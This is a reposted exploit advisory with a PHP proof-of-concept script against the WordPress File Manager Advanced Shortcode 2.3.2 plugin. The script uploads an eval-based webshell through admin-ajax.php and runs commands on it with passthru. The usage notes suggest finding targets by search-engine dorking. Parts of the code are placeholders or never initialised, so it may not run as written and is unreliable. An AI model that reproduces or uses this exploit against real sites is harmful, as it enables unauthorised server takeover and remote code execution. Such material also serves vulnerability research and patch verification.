WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload
2024-10-14 21:23:20 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================
| # Title : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 106 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class MetasploitModule {

private $targetUri;
private $webshellName;
private $wpData;
private $uploadPath;
private $postParam;
private $getParam;

public function __construct($targetUri, $webshell = null, $command = 'passthru') {
$this->targetUri = $targetUri;
$this->webshellName = $webshell ?: $this->generateRandomWebshellName();
$this->postParam = $this->generateRandomString();
$this->getParam = $this->generateRandomString();
}

private function generateRandomWebshellName() {
return bin2hex(random_bytes(rand(8, 16))) . '.php';
}

private function generateRandomString($length = 8) {
return bin2hex(random_bytes($length));
}

private function getFormData($pngWebshell) {
// Construct multipart form data
$boundary = md5(time());
$formData = "--$boundary\r\n";
$formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";
$formData .= "--$boundary\r\n";
$formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";
$formData .= "--$boundary\r\n";
$formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";
$formData .= "--$boundary\r\n";
$formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";
$formData .= "--$boundary\r\n";
$formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";
$formData .= "--$boundary\r\n";
$formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";
$formData .= "--$boundary\r\n";
$formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";
$formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";
$formData .= "--$boundary--\r\n";

return ['data' => $formData, 'boundary' => $boundary];
}

private function uploadWebshell($pngWebshell) {
$formData = $this->getFormData($pngWebshell);
$response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [
"Content-Type: multipart/form-data; boundary={$formData['boundary']}"
]);

// Handle response and check for upload success
$responseData = json_decode($response, true);
if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {
return true;
}

return false;
}

private function injectPhpPayloadPng($payload) {
// Here you should inject PHP code into a PNG file
// This is just a placeholder for the actual implementation
return $payload; // Placeholder for the injected PNG
}

private function executeCommand($cmd) {
$payload = base64_encode($cmd);
$this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [
$this->getParam => 'passthru', // replace with the command function
$this->postParam => $payload
]);
}

private function sendRequest($method, $uri, $data, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

public function exploit() {
// Check for vulnerabilities and upload webshell logic
$payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
$pngWebshell = $this->injectPhpPayloadPng($payload);
if ($this->uploadWebshell($pngWebshell)) {
$this->executeCommand('whoami'); // Replace 'whoami' with your desired command
} else {
echo "Failed to upload webshell.";
}
}
}

// Usage example
$exploit = new MetasploitModule('http://target-uri.com');
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


文章来源: https://packetstormsecurity.com/files/182169/wpfmas232-shell.txt
如有侵权请联系:admin#unsafe.sh